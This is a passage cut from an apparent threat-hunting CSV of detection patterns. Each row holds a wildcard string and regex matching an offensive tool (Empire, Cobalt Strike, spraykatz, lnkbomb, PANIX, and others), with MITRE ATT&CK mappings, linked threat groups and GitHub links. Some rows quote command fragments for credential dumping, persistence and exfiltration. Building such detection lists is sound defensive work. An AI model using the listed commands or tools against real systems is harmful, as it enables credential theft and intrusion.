TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51107" "*listen(58082* '0.0.0.0'*",".{0,1000}listen\(58082.{0,1000}\s\'0\.0\.0\.0\'.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","51108" "*listen_http 0.0.0.0 8080 *.php operation1*",".{0,1000}listen_http\s0\.0\.0\.0\s8080\s.{0,1000}\.php\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","51109" "*Listening for incoming ICMP packets...*",".{0,1000}Listening\sfor\sincoming\sICMP\spackets\.\.\..{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","51110" "*Listening for incoming requests on http://localhost:$port/*",".{0,1000}Listening\sfor\sincoming\srequests\son\shttp\:\/\/localhost\:\$port\/.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","51111" "*List-GraphRunnerModules*",".{0,1000}List\-GraphRunnerModules.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","51112" "*List-KeyCredentials -target *",".{0,1000}List\-KeyCredentials\s\-target\s.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","51113" "*listLocalAdminAccess(*",".{0,1000}listLocalAdminAccess\(.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","51114" "*ListMetasploitPayloads*",".{0,1000}ListMetasploitPayloads.{0,1000}","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51115" "*ListNeverLoggedInAccounts*",".{0,1000}ListNeverLoggedInAccounts.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51116" "*ListPasswordNeverExpire*",".{0,1000}ListPasswordNeverExpire.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - 
T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51117" "*listPwnableTargets(*",".{0,1000}listPwnableTargets\(.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","51118" "*lists.tor2web.org*",".{0,1000}lists\.tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","51119" "*ListUsersLastPasswordChange*",".{0,1000}ListUsersLastPasswordChange.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51120" "*ListUsersNoPasswordRequired*",".{0,1000}ListUsersNoPasswordRequired.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51121" 
"*ListUsersPasswordMustChange*",".{0,1000}ListUsersPasswordMustChange.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51122" "*ListUsersPasswordNotChanged*",".{0,1000}ListUsersPasswordNotChanged.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51123" "*litefuzz -lk -c*",".{0,1000}litefuzz\s\-lk\s\-c.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51124" "*litefuzz -s -a *",".{0,1000}litefuzz\s\-s\s\-a\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51125" "*litefuzz* -l -c*",".{0,1000}litefuzz.{0,1000}\s\-l\s\-c.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51126" "*litefuzz.py *",".{0,1000}litefuzz\.py\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and 
servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51127" "*litefuzz\fuzz.py*",".{0,1000}litefuzz\\fuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","51128" "*Live Dump Capture Dump Data API ended. NT Status: STATUS_SUCCESS.*",".{0,1000}Live\sDump\sCapture\sDump\sData\sAPI\sended\.\sNT\sStatus\:\sSTATUS_SUCCESS\..{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","51129" "*livevnc.ngrok.app*",".{0,1000}livevnc\.ngrok\.app.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","#macos","N/A","10","7","N/A","N/A","N/A","N/A","51130" "*lkarlslund/Adalanche*",".{0,1000}lkarlslund\/Adalanche.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","51131" 
"*lkarlslund/ldapnomnom*",".{0,1000}lkarlslund\/ldapnomnom.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","51132" "*LKM_HACKING.html*",".{0,1000}LKM_HACKING\.html.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","51134" "*lkmRootkitmodified*",".{0,1000}lkmRootkitmodified.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","51135" "*llehsrewop*",".{0,1000}llehsrewop.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed powershell","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51138" "*llkat/rsockstun*",".{0,1000}llkat\/rsockstun.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY 
BEAR","C2","https://github.com/llkat/rsockstun","1","1","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","51139" "*-llmnr -spn '*cifs* -secrets*",".{0,1000}\-llmnr\s\-spn\s\'.{0,1000}cifs.{0,1000}\s\-secrets.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","51140" "*LLMNR.py*",".{0,1000}LLMNR\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","51141" "*llmnr_sniffer.py*",".{0,1000}llmnr_sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","51142" "*LLMNRSpoofer*",".{0,1000}LLMNRSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51143" "*LLMNRSpoofer*",".{0,1000}LLMNRSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - 
T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51144" "*llsrpc_##*",".{0,1000}llsrpc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","51145" "*LMGsec/o365creeper*",".{0,1000}LMGsec\/o365creeper.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","51146" "*lmhash*aad3b435b51404eeaad3b435b51404ee*",".{0,1000}lmhash.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","51147" "*ln -s /run/systemd/system/generator.service /run/systemd/system/multi-user.target.wants/generator.service*",".{0,1000}ln\s\-s\s\/run\/systemd\/system\/generator\.service\s\/run\/systemd\/system\/multi\-user\.target\.wants\/generator\.service.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - 
T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","51152" "*L'n', L't', L'd', L'l', L'l', L'.', L'd', L'l', L'l', L'\0'*",".{0,1000}L\'n\',\sL\'t\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\.\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\\0\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","51154" "*lnkbomb.py *",".{0,1000}lnkbomb\.py\s.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","51157" "*lnkbomb-1.0.zip*",".{0,1000}lnkbomb\-1\.0\.zip.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","51158" "*lnk-generate.py --host * --type ntlm --output *.lnk*",".{0,1000}lnk\-generate\.py\s\-\-host\s.{0,1000}\s\-\-type\sntlm\s\-\-output\s.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51159" "*lnkup.py --*",".{0,1000}lnkup\.py\s\-\-.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","51160" "*lnx_keylogger.py*",".{0,1000}lnx_keylogger\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","51161" "*load aggressor script*",".{0,1000}load\saggressor\sscript.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - 
Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","51162" "*load incognito*",".{0,1000}load\sincognito.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Incognito","10","10","N/A","N/A","N/A","N/A","51163" "*load kiwi*",".{0,1000}load\skiwi.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Mimikatz","10","10","N/A","N/A","N/A","N/A","51164" "*load mimikatz windbg extension, extracts credential from crash dump*",".{0,1000}load\smimikatz\swindbg\sextension,\sextracts\scredential\sfrom\scrash\sdump.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential 
Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","51165" "*Load the passwords from another Windows user or external drive*",".{0,1000}Load\sthe\spasswords\sfrom\sanother\sWindows\suser\sor\sexternal\sdrive.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51166" "*Load the passwords of the current logged-on 